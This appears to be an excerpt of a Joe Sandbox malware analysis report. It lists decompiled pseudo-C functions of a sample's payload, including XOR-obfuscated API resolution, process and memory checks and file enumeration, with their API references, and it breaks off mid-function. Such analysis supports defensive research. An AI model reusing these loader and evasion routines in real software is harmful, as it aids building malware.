    0x0040288e
    0x00000000
    0x0040288e
    0x00402872
    0x00000000
    0x0040282c

    APIs
    • lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
    • lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A1C40, Relevance: 1.6, APIs: 1, Instructions: 54
    APIs
      • Part of subcall function 012A1BC6: GetSystemTimeAsFileTime.KERNEL32(?,012A1D55,00000000,?,00000000,?,00000000,?,?,012A1D55), ref: 012A1BFC
      • Part of subcall function 012A1BC6: HeapFree.KERNEL32(00000000,00000000,012A1D55), ref: 012A1C2C
    • GetModuleHandleA.KERNEL32(012AC0EA,?,012ACA6A,00000014,?,012AA03C,00000000,?,?,?,012A1D55), ref: 012A1C71
      • Part of subcall function 012A2544: SysAllocString.OLEAUT32(?), ref: 012A255E
      • Part of subcall function 012A2544: SysFreeString.OLEAUT32(00000000), ref: 012A2595
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 004022AD, Relevance: 1.3, APIs: 1, Instructions: 46
    C-Code - Quality: 88%
    			E004022AD(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, signed char _a16) {
				void* __ecx;
				void* __esi;
				void* _t20;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;

				_t24 = __edx;
				_t22 = 8;
				_t26 = E00401046(0x318);
				if(_t26 != 0) {
					memset(_t26, 0, 0x318);
					asm("cdq");
					 *((intOrPtr*)(_t26 + 8)) = _a8;
					 *((intOrPtr*)(_t26 + 0xc)) = _t24;
					asm("cdq");
					 *((intOrPtr*)(_t26 + 0x10)) = _a12;
					 *((intOrPtr*)(_t26 + 0x14)) = _t24;
					if((_a16 & 0x00000010) != 0) {
						L4:
						_t20 = E0040218D(_a4, _t23, _t24, _t26); // executed
					} else {
						_t31 =  *0x405480 & 0x00000001;
						if(( *0x405480 & 0x00000001) == 0) {
							goto L4;
						} else {
							_t20 = E0040203C(_t23, _t24, _t26, _t31, _a4);
						}
					}
					_t22 = _t20;
					E0040105B(_t26);
				}
				return _t22;
			}










    0x004022ad
    0x004022b6
    0x004022c2
    0x004022c6
    0x004022cc
    0x004022d4
    0x004022d5
    0x004022db
    0x004022de
    0x004022e6
    0x004022e9
    0x004022ec
    0x00402301
    0x00402304
    0x004022ee
    0x004022ee
    0x004022f5
    0x00000000
    0x004022f7
    0x004022fa
    0x004022fa
    0x004022f5
    0x0040230a
    0x0040230c
    0x0040230c
    0x00402318

    APIs
      • Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,0040272F,?,?,00000000,?,00000006,00000006,?,00401128,?,?,736C6E70,?,00000000), ref: 00401052
    • memset.NTDLL ref: 004022CC
      • Part of subcall function 0040218D: memset.NTDLL ref: 004021AF
      • Part of subcall function 0040218D: memcpy.NTDLL(00000218,00402C82,00000100,?,00010003,?,?,00000318,00000008), ref: 0040222A
      • Part of subcall function 0040218D: RtlNtStatusToDosError.NTDLL(00000000), ref: 0040227F
      • Part of subcall function 0040218D: GetLastError.KERNEL32(?,00000318,00000008), ref: 0040229D
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 0040203C: memset.NTDLL ref: 00402062
      • Part of subcall function 0040203C: memcpy.NTDLL ref: 0040208A
      • Part of subcall function 0040203C: GetLastError.KERNEL32(00000010,00000218,00402C5D,00000100,?,00000318,00000008), ref: 004020A1
      • Part of subcall function 0040203C: GetLastError.KERNEL32(00000010,?,00000000,?,?,?,?,?,?,?,?,00000010,00000218,00402C5D,00000100), ref: 0040217F
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A4F30, Relevance: 1.3, APIs: 1, Instructions: 36sleep
    APIs
    • Sleep.KERNELBASE(000001F4), ref: 012A4F75
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd

    Non-executed Functions

    Function 00402653, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
    C-Code - Quality: 74%
    			E00402653() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t3;
				intOrPtr* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				signed int _t11;
				signed int _t13;

				_t3 = GetModuleHandleA("NTDLL.DLL");
				 *0x4054c4 = _t3;
				if(_t3 == 0) {
					_push(0x7e);
					goto L9;
				} else {
					 *0x4054c8 = GetModuleHandleA("KERNEL32.DLL");
					_t11 = 0;
					while(1) {
						_t10 =  *0x4054c4; // 0x774a0000
						_push( *(_t11 + 0x40501c) ^  *0x405498);
						_t13 = 0;
						_push(0);
						_push(_t10);
						_t9 = _t10;
						_t8 = E004027DB(_t9, _t11, 0, 0);
						if(_t8 != 0) {
							_t13 =  *_t8 + _t9;
						}
						 *(_t11 + 0x40501c) = _t13;
						if(_t13 == 0) {
							break;
						}
						_t11 = _t11 + 4;
						if(_t11 < 0x14) {
							continue;
						} else {
						}
						goto L10;
					}
					_push(0x7f);
					L9:
					_pop(0);
				}
				L10:
				return 0;
			}













    0x00402664
    0x00402668
    0x0040266d
    0x004026bb
    0x00000000
    0x0040266f
    0x00402676
    0x0040267b
    0x0040267d
    0x00402689
    0x0040268f
    0x00402690
    0x00402692
    0x00402693
    0x00402694
    0x00402696
    0x0040269d
    0x004026a1
    0x004026a1
    0x004026a5
    0x004026ab
    0x00000000
    0x00000000
    0x004026ad
    0x004026b3
    0x00000000
    0x00000000
    0x004026b5
    0x00000000
    0x004026b3
    0x004026b7
    0x004026bd
    0x004026bd
    0x004026bd
    0x004026c0
    0x004026c4

    APIs
    • GetModuleHandleA.KERNEL32(NTDLL.DLL,773DA47B,0000000C,?,?,004010FB,?,00000000), ref: 00402664
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,004010FB,?,00000000), ref: 00402674
      • Part of subcall function 004027DB: lstrcmp.KERNEL32(?,?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028A9
      • Part of subcall function 004027DB: lstrlenA.KERNEL32(?,00404108,0000002C,0040269B,774A0000,00000000,774E55E0,?,?,004010FB,?,00000000), ref: 004028B4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00401AA8, Relevance: 6.0, APIs: 4, Instructions: 38
    C-Code - Quality: 100%
    			E00401AA8() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x405484; // 0x400000
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x405490 = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x40547c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x405478 = _t5;
						 *0x405484 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x405474 = _t6;
						if(_t6 == 0) {
							 *0x405474 =  *0x405474 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










    0x00401aa9
    0x00401ab7
    0x00401abf
    0x00401ac4
    0x00401b16
    0x00401b16
    0x00401ac6
    0x00401ace
    0x00401ad6
    0x00401ad6
    0x00401b12
    0x00401b14
    0x00000000
    0x00000000
    0x00000000
    0x00401ad0
    0x00401ad2
    0x00401ad8
    0x00401ad8
    0x00401add
    0x00401aeb
    0x00401af0
    0x00401af6
    0x00401afe
    0x00401b03
    0x00401b05
    0x00401b05
    0x00401b0f
    0x00401ad4
    0x00401ad4
    0x00000000
    0x00401ad4
    0x00401ad2

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401086,?,00000000), ref: 00401AB7
    • GetVersion.KERNEL32(?,00000000), ref: 00401AC6
    • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401ADD
    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401AF6
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 004025C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
    C-Code - Quality: 58%
    			E004025C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				intOrPtr* _t5;
				long _t6;
				void* _t9;

				_t5 =  *0x405028;
				_t9 = 0;
				if(_t5 == 0) {
					_t6 = 0xc0000002;
					goto L4;
				} else {
					_t1 =  &_a16; // 0x402260
					_t6 =  *_t5(_a4, _a8, _a12, 0x318,  *_t1);
					if(_t6 < 0) {
						L4:
						SetLastError(RtlNtStatusToDosError(_t6));
					} else {
						_t9 = 1;
					}
				}
				return _t9;
			}






    0x004025c0
    0x004025c6
    0x004025ca
    0x004025ea
    0x00000000
    0x004025cc
    0x004025cc
    0x004025e1
    0x004025e5
    0x004025ef
    0x004025f7
    0x004025e7
    0x004025e7
    0x004025e7
    0x004025e5
    0x00402600

    APIs
    • RtlNtStatusToDosError.NTDLL(C0000002), ref: 004025F0
    • SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004025F7
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00402603, Relevance: 3.0, APIs: 2, Instructions: 29
    C-Code - Quality: 58%
    			E00402603(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				intOrPtr* _t12;
				long _t14;

				_t12 =  *0x40502c;
				_v8 = _v8 & 0x00000000;
				if(_t12 != 0) {
					_v8 = _v8 & 0x00000000;
					_v12 = 0x318;
					_t14 =  *_t12(_a4,  &_v8, 0,  &_v12, 0x3000, 0x40);
					if(_t14 < 0) {
						SetLastError(RtlNtStatusToDosError(_t14));
						_v8 = _v8 & 0x00000000;
					}
				}
				return _v8;
			}







    0x00402608
    0x0040260d
    0x00402613
    0x00402615
    0x0040262d
    0x00402634
    0x00402638
    0x00402642
    0x00402648
    0x00402648
    0x00402638
    0x00402650

    APIs
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040263B
    • SetLastError.KERNEL32(00000000), ref: 00402642
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A2922, Relevance: 1.9, APIs: 1, Instructions: 610
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 00402F99, Relevance: 1.7, APIs: 1, Instructions: 195nativeLIBRARYCODE
    C-Code - Quality: 100%
    			E00402F99(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x4054d0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x405518 = 1;
										__eflags =  *0x405518;
										if( *0x405518 != 0) {
											goto L60;
										}
										_t84 =  *0x4054d0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x405518 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x4054d0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x4054d8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x4054d4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x405518 = 1;
							__eflags =  *0x405518;
							if( *0x405518 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x405518 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x4054d8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x4054d0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x4054d8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x4054d8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































    0x00402fa3
    0x00402fa6
    0x00402fac
    0x00402fca
    0x00000000
    0x00402fca
    0x00402fb4
    0x00402fbd
    0x00402fc3
    0x00402fd2
    0x00402fd5
    0x00402fd8
    0x00402fe2
    0x00402fe2
    0x00402fe4
    0x00402fe7
    0x00402fe9
    0x00402fe9
    0x00402feb
    0x00402fee
    0x00000000
    0x00000000
    0x00402ff0
    0x00402ff2
    0x00403058
    0x00403058
    0x004031b6
    0x00000000
    0x004031b6
    0x00402ff4
    0x00402ff4
    0x00402ff8
    0x00402ffa
    0x00402ffa
    0x00402ffa
    0x00402ffa
    0x00402ffd
    0x00402ffe
    0x00403001
    0x00403001
    0x00403005
    0x00403009
    0x00403017
    0x00403017
    0x0040301f
    0x00403025
    0x00403027
    0x00403029
    0x00403039
    0x00403046
    0x0040304a
    0x0040304f
    0x00403051
    0x004030cf
    0x004030cf
    0x00403053
    0x00403053
    0x00403053
    0x004030d1
    0x004030d3
    0x004031b4
    0x004031b4
    0x00000000
    0x004030d9
    0x004030d9
    0x004030e0
    0x00000000
    0x00000000
    0x004030e6
    0x004030ea
    0x00403146
    0x00403148
    0x00403150
    0x00403152
    0x00403154
    0x00000000
    0x00000000
    0x00403156
    0x0040315c
    0x0040315e
    0x00403160
    0x00403175
    0x00403175
    0x00403177
    0x004031a6
    0x004031ad
    0x00000000
    0x004031ad
    0x0040317b
    0x0040317c
    0x0040317e
    0x00403180
    0x00403180
    0x00403182
    0x00403184
    0x00403186
    0x0040319a
    0x0040319a
    0x0040319d
    0x0040319f
    0x0040319f
    0x004031a0
    0x004031a0
    0x00000000
    0x00403188
    0x00403188
    0x00403188
    0x00403191
    0x00403192
    0x00403194
    0x00403196
    0x00403196
    0x00000000
    0x00403188
    0x00403186
    0x00403162
    0x00403169
    0x00403169
    0x0040316b
    0x00000000
    0x00000000
    0x0040316d
    0x0040316e
    0x00403171
    0x00403173
    0x00000000
    0x00000000
    0x00000000
    0x00403173
    0x00000000
    0x00403169
    0x004030ec
    0x004030ef
    0x004030f4
    0x00000000
    0x00000000
    0x004030fd
    0x004030ff
    0x00403105
    0x00000000
    0x00000000
    0x0040310b
    0x00403111
    0x00000000
    0x00000000
    0x00403117
    0x00403119
    0x00403122
    0x00403126
    0x00000000
    0x00000000
    0x0040312c
    0x0040312f
    0x00403131
    0x00000000
    0x00000000
    0x00403138
    0x0040313a
    0x00000000
    0x00000000
    0x0040313c
    0x00403140
    0x00000000
    0x00000000
    0x00000000
    0x00403140
    0x00000000
    0x00000000
    0x00000000
    0x0040302b
    0x0040302b
    0x0040302b
    0x00403032
    0x00000000
    0x00000000
    0x00403034
    0x00403035
    0x00403037
    0x00000000
    0x00000000
    0x00000000
    0x00403037
    0x0040305f
    0x00403061
    0x00000000
    0x00000000
    0x00403071
    0x00403073
    0x00403075
    0x00000000
    0x00000000
    0x0040307b
    0x00403082
    0x004030ae
    0x004030ae
    0x004030b0
    0x004030b2
    0x004030c6
    0x004030c8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004030b4
    0x004030b4
    0x004030b4
    0x004030bd
    0x004030be
    0x004030c0
    0x004030c2
    0x004030c2
    0x00000000
    0x004030b4
    0x00403084
    0x00403084
    0x00403087
    0x00403089
    0x0040309b
    0x0040309b
    0x0040309e
    0x004030a0
    0x004030a0
    0x004030a1
    0x004030a1
    0x004030a7
    0x004030a7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040308b
    0x0040308b
    0x0040308b
    0x00403092
    0x00000000
    0x00000000
    0x00403094
    0x00403094
    0x00403095
    0x00000000
    0x00000000
    0x00000000
    0x00403095
    0x00403097
    0x00403099
    0x004030ac
    0x00000000
    0x00000000
    0x00000000
    0x004030ac
    0x00000000
    0x00403099
    0x0040300b
    0x0040300e
    0x00403011
    0x00000000
    0x00000000
    0x00403013
    0x00403015
    0x00000000
    0x00000000
    0x00000000
    0x00403015
    0x00402fda
    0x00402fdc
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040304A
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 0040259F, Relevance: 1.5, APIs: 1, Instructions: 11
    C-Code - Quality: 37%
    			E0040259F(intOrPtr _a4, intOrPtr _a8) {
				void* _t3;
				intOrPtr* _t6;

				_t6 =  *0x40501c;
				_t3 = 0x7f;
				if(_t6 != 0) {
					return RtlNtStatusToDosError( *_t6(_a4, _a8));
				}
				return _t3;
			}





    0x0040259f
    0x004025a9
    0x004025aa
    0x00000000
    0x004025b7
    0x004025bd

    APIs
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 004025B7
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 00402D2C, Relevance: .0, Instructions: 19
    C-Code - Quality: 68%
    			E00402D2C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t14;
				intOrPtr _t18;
				void* _t19;
				void* _t20;

				_push(E00402D80);
				_push( *[fs:0x0]);
				 *((intOrPtr*)(_t20 + 0x10)) = _t18;
				_t19 = _t20 + 0x10;
				 *((intOrPtr*)(_t19 - 0x18)) = _t20 -  *((intOrPtr*)(_t20 + 0x10));
				_push( *((intOrPtr*)(_t19 - 8)));
				 *((intOrPtr*)(_t19 - 4)) = 0xffffffff;
				 *((intOrPtr*)(_t19 - 8)) =  *((intOrPtr*)(_t19 - 4));
				_t9 = _t19 - 0x10; // -16
				_t14 = _t9;
				 *[fs:0x0] = _t14;
				return _t14;
			}







    0x00402d2c
    0x00402d37
    0x00402d3c
    0x00402d40
    0x00402d4c
    0x00402d4f
    0x00402d53
    0x00402d5a
    0x00402d5d
    0x00402d5d
    0x00402d60
    0x00402d66

    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A3C32, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 217filememorytime
    APIs
    • memset.NTDLL ref: 012A3C99
    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012A3CCB
    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 012A3CDF
    • CloseHandle.KERNEL32(?), ref: 012A3CF6
    • lstrcat.KERNEL32(00000000,012AC67D), ref: 012A3D3C
    • FindNextFileA.KERNEL32(?,?), ref: 012A3D84
    • StrChrA.SHLWAPI(?,0000002E), ref: 012A3DF2
    • memcpy.NTDLL(?,?,00000000), ref: 012A3E2B
    • FindNextFileA.KERNEL32(?,?), ref: 012A3E40
    • CompareFileTime.KERNEL32(?,?), ref: 012A3E69
    • HeapFree.KERNEL32(00000000,?), ref: 012A3EB0
    • HeapFree.KERNEL32(00000000,00000000), ref: 012A3EC0
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 0040231B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108memorystring
    C-Code - Quality: 100%
    			E0040231B(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				long _v4;
				char _v8;
				signed int _v12;
				long _v20;
				long _v24;
				void* _t37;
				intOrPtr* _t40;
				intOrPtr* _t41;
				char* _t42;
				CHAR* _t48;
				long _t52;
				void* _t53;
				void* _t55;

				_v12 = 2;
				E00401D9F(_a4, 0, 0,  &_v8);
				_t52 = _v24;
				_v20 = _t52;
				_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
				if(_t55 == 0) {
					L15:
					_v12 = 8;
					L16:
					if(_t55 != 0) {
						VirtualFree(_t55, 0, 0x8000);
					}
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
